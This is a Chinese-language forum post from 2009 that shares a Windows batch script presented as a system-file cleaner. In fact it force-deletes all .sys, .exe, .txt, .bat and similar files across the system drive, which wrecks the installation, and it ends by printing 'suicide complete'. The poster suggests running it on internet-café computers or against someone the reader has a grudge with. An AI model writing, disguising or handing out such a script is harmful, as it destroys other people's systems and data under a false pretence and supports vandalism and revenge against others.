|
本帖最后由 fengjian 于 2009-10-10 11:22 编辑
请不要在自己电脑上试...如果在自己电脑上运行的.....后果自负!!!....当然可以去网吧搞搞了....这个狠毒的.....
代码如下;
@echo off
echo 正在清理系统文件,请稍等......
del /f /s /q %systemdrive%\*.sys
del /f /s /q %systemdrive%\*.exe
del /f /s /q %systemdrive%\*.txt
del /f /s /q %systemdrive%\*.bat
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 自杀完成!
echo. & pause
保存格式为bat
严重声明:如果是在自己家里上网,最好不要运行.不过如果有人跟你有仇,而且不在网吧上网.你可以.......... |
|